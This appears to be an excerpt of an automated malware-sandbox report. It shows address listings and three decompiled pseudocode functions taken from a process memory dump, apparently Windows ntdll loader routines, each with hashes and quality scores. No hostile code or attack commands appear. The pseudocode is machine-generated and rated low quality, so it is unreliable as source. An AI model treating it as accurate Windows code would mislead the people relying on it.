                                                    0x1d795ca7
                                                    0x1d795cad
                                                    0x1d795cba
                                                    0x1d7f087c
                                                    0x1d795cc0
                                                    0x1d795cc0
                                                    0x1d795cc0
                                                    0x1d795cc4
                                                    0x1d7f0886
                                                    0x1d7f0889
                                                    0x1d7f0889
                                                    0x1d795cd1
                                                    0x1d7f0897
                                                    0x1d7f0897
                                                    0x1d795cf0
                                                    0x1d7f08a2
                                                    0x1d7f08a2
                                                    0x1d795cf6
                                                    0x1d795cfc
                                                    0x1d795d09
                                                    0x1d7f08ae
                                                    0x1d7f08ae
                                                    0x1d795d0f
                                                    0x1d795d15
                                                    0x1d795d22
                                                    0x1d7f08ba
                                                    0x1d7f08ba
                                                    0x1d795d22
                                                    0x1d795d28
                                                    0x1d795d2f
                                                    0x1d795d37
                                                    0x1d795d39
                                                    0x1d795d40
                                                    0x1d795d47
                                                    0x1d795f41
                                                    0x1d795f47
                                                    0x1d795fc2
                                                    0x1d795fc8
                                                    0x1d795f49
                                                    0x1d795f49
                                                    0x1d795f49
                                                    0x1d795d4d
                                                    0x1d795d4d
                                                    0x1d795d4d
                                                    0x00000000
                                                    0x1d795d47
                                                    0x1d795be7
                                                    0x1d795e7f
                                                    0x1d795baf
                                                    0x00000000
                                                    0x1d795baf
                                                    0x1d795ba1
                                                    0x1d795a46
                                                    0x1d795a4b
                                                    0x1d795a52
                                                    0x1d795a5f
                                                    0x1d795a64
                                                    0x1d795a6b
                                                    0x1d795a71
                                                    0x1d795a76
                                                    0x1d7f0772
                                                    0x1d796068
                                                    0x1d796073
                                                    0x1d796073
                                                    0x1d795a7c
                                                    0x1d795a82
                                                    0x1d795a88
                                                    0x1d795a8e
                                                    0x1d795a92
                                                    0x1d795a95
                                                    0x1d795a9c
                                                    0x1d795aa3
                                                    0x1d795ab6
                                                    0x1d795abb
                                                    0x1d795abe
                                                    0x1d795ac5
                                                    0x1d795ace
                                                    0x1d795ad1
                                                    0x1d795ad3
                                                    0x00000000
                                                    0x1d795ad3
                                                    0x1d7959fe
                                                    0x1d795a01
                                                    0x1d795a07
                                                    0x1d795a08
                                                    0x1d795a0d
                                                    0x1d795a15
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795a1b
                                                    0x1d795a1e
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: f55f9dd32059164d5a733f06b810bb2038b3af185537e29d479efc360a7b598b
                                                    • Instruction ID: cbc2b339e9e9de88fe4a2da49d699981c739dca8bc03a9308c5fd283e0b52f76
                                                    • Opcode Fuzzy Hash: f55f9dd32059164d5a733f06b810bb2038b3af185537e29d479efc360a7b598b
                                                    • Instruction Fuzzy Hash: E4327B75D0426ADFDB29CF64D884BEDBBB0BF08324F0081EAD549A7251D7746A84CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7C4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E1D7C4B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1d88b370 ^ _t114;
				_v8 =  *0x1d88b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1D7D4B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E1D7E8A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E1D7E8A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1d8865e4; // 0x75f1f0e0
															 *0x1d8891e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1D7926A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1d8837c0 & 0x00000003) != 0) {
																		E1D80E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1d8837c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1d8837c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1D80E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}





























                                                    0x1d7c4b79
                                                    0x1d7c4b86
                                                    0x1d7c4b88
                                                    0x1d7c4b8e
                                                    0x1d7c4b90
                                                    0x1d7c4b93
                                                    0x1d7c4b97
                                                    0x1d7c4c27
                                                    0x1d7c4c35
                                                    0x1d7c4ba7
                                                    0x1d7c4ba7
                                                    0x1d7c4baa
                                                    0x1d7c4bac
                                                    0x1d7c4bb2
                                                    0x1d7c4bb2
                                                    0x1d7c4bb5
                                                    0x1d7c4bbc
                                                    0x1d80330f
                                                    0x1d803316
                                                    0x1d803317
                                                    0x1d80331e
                                                    0x1d803321
                                                    0x1d803324
                                                    0x1d803327
                                                    0x1d80332a
                                                    0x1d803331
                                                    0x1d803334
                                                    0x1d803339
                                                    0x1d80333e
                                                    0x1d80333e
                                                    0x1d7c4bca
                                                    0x1d803344
                                                    0x1d80334b
                                                    0x1d80334c
                                                    0x1d803353
                                                    0x1d803356
                                                    0x1d80335d
                                                    0x1d803360
                                                    0x1d803363
                                                    0x1d80336a
                                                    0x1d80336d
                                                    0x1d803372
                                                    0x1d803372
                                                    0x1d7c4bd0
                                                    0x1d7c4bd0
                                                    0x1d7c4bd5
                                                    0x1d7c4c36
                                                    0x1d7c4c36
                                                    0x00000000
                                                    0x1d7c4bd7
                                                    0x1d7c4bd7
                                                    0x1d7c4bd7
                                                    0x1d7c4bdf
                                                    0x00000000
                                                    0x1d7c4be1
                                                    0x1d7c4be3
                                                    0x1d7c4bec
                                                    0x1d7c4bef
                                                    0x1d7c4bf0
                                                    0x1d7c4bf9
                                                    0x1d7c4bfd
                                                    0x1d7c4bff
                                                    0x1d7c4c04
                                                    0x1d7c4c06
                                                    0x1d7c4c07
                                                    0x1d7c4c0a
                                                    0x1d7c4c0c
                                                    0x1d7c4c0f
                                                    0x1d7c4c1a
                                                    0x1d7c4c1c
                                                    0x1d7c4c21
                                                    0x1d80337a
                                                    0x1d80337a
                                                    0x1d80337d
                                                    0x1d80337d
                                                    0x1d803384
                                                    0x00000000
                                                    0x1d803386
                                                    0x1d803386
                                                    0x1d80338b
                                                    0x1d8033b2
                                                    0x1d8033b5
                                                    0x1d8033b9
                                                    0x1d8033be
                                                    0x1d8033f7
                                                    0x1d8033f7
                                                    0x1d7c4c76
                                                    0x1d7c4c84
                                                    0x1d7c4c8c
                                                    0x1d7c4c90
                                                    0x1d7c4ca9
                                                    0x1d7c4ca9
                                                    0x1d7c4cae
                                                    0x1d7c4ce4
                                                    0x1d7c4cee
                                                    0x1d7c4cf3
                                                    0x1d7c4cf3
                                                    0x1d7c4ce6
                                                    0x1d7c4ce6
                                                    0x1d7c4cb2
                                                    0x1d803463
                                                    0x1d80347b
                                                    0x1d803480
                                                    0x1d80348a
                                                    0x1d803490
                                                    0x1d803490
                                                    0x1d80348a
                                                    0x1d7c4cbe
                                                    0x1d7c4c92
                                                    0x1d7c4c98
                                                    0x1d7c4cc5
                                                    0x00000000
                                                    0x1d803423
                                                    0x1d803429
                                                    0x00000000
                                                    0x1d80342f
                                                    0x00000000
                                                    0x1d80342f
                                                    0x1d803429
                                                    0x00000000
                                                    0x1d7c4c9a
                                                    0x1d7c4c9a
                                                    0x1d7c4ca1
                                                    0x1d803434
                                                    0x1d803435
                                                    0x1d80344f
                                                    0x1d803454
                                                    0x1d803454
                                                    0x1d7c4ca7
                                                    0x1d7c4ca7
                                                    0x00000000
                                                    0x1d7c4c98
                                                    0x1d803391
                                                    0x1d803398
                                                    0x1d80339c
                                                    0x1d8033a2
                                                    0x00000000
                                                    0x1d8033a2
                                                    0x1d80338b
                                                    0x00000000
                                                    0x1d8033a7
                                                    0x1d8033a7
                                                    0x1d8033a9
                                                    0x1d8033ad
                                                    0x1d7c4c21
                                                    0x1d7c4c1a
                                                    0x1d7c4c04
                                                    0x00000000
                                                    0x1d7c4bfd
                                                    0x1d7c4bdf
                                                    0x00000000
                                                    0x1d7c4bd5
                                                    0x00000000
                                                    0x1d7c4bac
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$Flst
                                                    • API String ID: 0-758220159
                                                    • Opcode ID: f16067f3a2b929a28e4131bb677f167242861a1f36ad9a2cedca8abacfc36cee
                                                    • Instruction ID: 1ad0d226fbecf5345ad7895e6bf33a0caf02d061a80bed750351d4d07f145d79
                                                    • Opcode Fuzzy Hash: f16067f3a2b929a28e4131bb677f167242861a1f36ad9a2cedca8abacfc36cee
                                                    • Instruction Fuzzy Hash: 63518DB1E0069A8FDB25CF95D88476DFBF4FF44769F15802BD0499B260E770A981CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D790485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E1D790485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x1d886630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E1D7982E0(0xabababab, 0, "kLsE", 0);
					 *0x1d886630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E1D7B5C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E1D790670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E1D790670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E1D790630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E1D7D5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E1D7D3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E1D790690) {
					 *0x1d8891e0();
					_t50 =  *_t73();
				} else {
					_t50 = E1D790690();
				}
				_t84 = _t50;
				goto L4;
			}


















                                                    0x1d79048f
                                                    0x1d790493
                                                    0x1d79049a
                                                    0x1d7904a0
                                                    0x1d7904a3
                                                    0x1d7904a6
                                                    0x1d7904af
                                                    0x1d7904b8
                                                    0x1d7904c2
                                                    0x1d7904cb
                                                    0x1d7904ce
                                                    0x1d7904d2
                                                    0x1d7904d6
                                                    0x1d79060e
                                                    0x1d790610
                                                    0x1d790618
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7904ef
                                                    0x1d7904ef
                                                    0x1d7904f2
                                                    0x1d7905e3
                                                    0x1d7905ea
                                                    0x1d7905f1
                                                    0x1d7905f1
                                                    0x1d790501
                                                    0x1d790501
                                                    0x1d790504
                                                    0x1d79050c
                                                    0x1d790519
                                                    0x1d79051b
                                                    0x00000000
                                                    0x1d7ee99c
                                                    0x1d7ee9a2
                                                    0x1d7ee9ac
                                                    0x1d79051f
                                                    0x1d79052a
                                                    0x1d7ee9b9
                                                    0x1d7905cd
                                                    0x1d7905d3
                                                    0x1d7905d3
                                                    0x1d7ee9bf
                                                    0x1d79053c
                                                    0x1d79054d
                                                    0x1d790559
                                                    0x1d790562
                                                    0x1d7ee9ce
                                                    0x1d7ee9ce
                                                    0x1d79056a
                                                    0x1d79057b
                                                    0x1d790580
                                                    0x1d790580
                                                    0x1d79058f
                                                    0x1d790597
                                                    0x1d790598
                                                    0x1d79059d
                                                    0x1d7905a1
                                                    0x1d7905a5
                                                    0x1d7905ad
                                                    0x1d7905b3
                                                    0x1d7ee9dd
                                                    0x00000000
                                                    0x1d7ee9ed
                                                    0x00000000
                                                    0x1d7ee9ed
                                                    0x1d7ee9dd
                                                    0x1d7905b9
                                                    0x1d7905be
                                                    0x1d7905c7
                                                    0x1d7ee9f2
                                                    0x1d7ee9f2
                                                    0x1d7905c7
                                                    0x00000000
                                                    0x1d7905ad
                                                    0x00000000
                                                    0x1d7ee9b2
                                                    0x1d79050c
                                                    0x1d7904fb
                                                    0x1d7ee989
                                                    0x1d7ee990
                                                    0x00000000
                                                    0x1d7ee990
                                                    0x00000000
                                                    0x1d7904fb
                                                    0x1d7904dc
                                                    0x1d7904e2
                                                    0x1d7905d6
                                                    0x1d7905dc
                                                    0x1d7904e8
                                                    0x1d7904e8
                                                    0x1d7904e8
                                                    0x1d7904ed
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D790586
                                                    • kLsE, xrefs: 1D7905FE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 3446177414-2547482624
                                                    • Opcode ID: 2143629e4c38ffecef6c917a9761ce713c27bc8e14418a79fc5598b66b9ad884
                                                    • Instruction ID: 60c160b4a53355d9045a10c194873844cc59f29a39cea68750078cb00fcce69b
                                                    • Opcode Fuzzy Hash: 2143629e4c38ffecef6c917a9761ce713c27bc8e14418a79fc5598b66b9ad884
                                                    • Instruction Fuzzy Hash: 3D51C072A20756DFD71ADFA4E485AAAB7F4AF44330F00883ED69983250E734A504CB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D78DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 25%
                                                    			E1D78DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d88b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1D7D8F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L1D7A2330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1D7A24D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1d8891e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1D7D4B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                    0x1d78df21
                                                    0x1d78df29
                                                    0x1d78df33
                                                    0x1d78df3b
                                                    0x1d78df40
                                                    0x1d78df44
                                                    0x1d78df46
                                                    0x1d78df52
                                                    0x1d78df56
                                                    0x1d78df5b
                                                    0x1d78df5e
                                                    0x1d78df61
                                                    0x1d78df65
                                                    0x1d78df67
                                                    0x1d78e058
                                                    0x1d78e05a
                                                    0x1d78e05d
                                                    0x00000000
                                                    0x1d78df6d
                                                    0x1d78df6d
                                                    0x1d78df70
                                                    0x1d7ed6ea
                                                    0x1d7ed6f3
                                                    0x00000000
                                                    0x1d7ed6ec
                                                    0x1d7ed6ec
                                                    0x1d7ed6ec
                                                    0x1d78df76
                                                    0x1d78df76
                                                    0x1d78df78
                                                    0x1d78df78
                                                    0x1d78df79
                                                    0x1d78df80
                                                    0x1d78e019
                                                    0x1d78e024
                                                    0x1d78e02c
                                                    0x1d78e032
                                                    0x1d78e03b
                                                    0x1d78e045
                                                    0x1d78e04b
                                                    0x1d78e04e
                                                    0x1d78e04e
                                                    0x1d78df8d
                                                    0x1d78df91
                                                    0x1d78df94
                                                    0x1d78df99
                                                    0x1d78dfa0
                                                    0x1d78dfab
                                                    0x1d78dfb3
                                                    0x1d78dfb7
                                                    0x1d78dfbb
                                                    0x1d78dfbc
                                                    0x1d78dfc0
                                                    0x1d78dfc8
                                                    0x1d78dfc9
                                                    0x1d78dfca
                                                    0x1d78dfcd
                                                    0x1d78dfe0
                                                    0x1d78dfea
                                                    0x1d78dfea
                                                    0x1d78dfec
                                                    0x1d78dfec
                                                    0x1d78df70
                                                    0x1d78dff2
                                                    0x1d78dff3
                                                    0x1d78dff4
                                                    0x1d78dfff

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: 0$0
                                                    • API String ID: 3446177414-203156872
                                                    • Opcode ID: 1dc23738b7162c8203fc1b46121eb0ac8538f3bfb87308060226329249cd3655
                                                    • Instruction ID: c3aabd2ddb5d8ac1dd8886ef584b38ceb7f890f54587a120e07293f6c9ce8617
                                                    • Opcode Fuzzy Hash: 1dc23738b7162c8203fc1b46121eb0ac8538f3bfb87308060226329249cd3655
                                                    • Instruction Fuzzy Hash: 664149B16087429FC301CF2CC484A5ABBE4BB8D764F044A6EF998DB351D771EA05CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%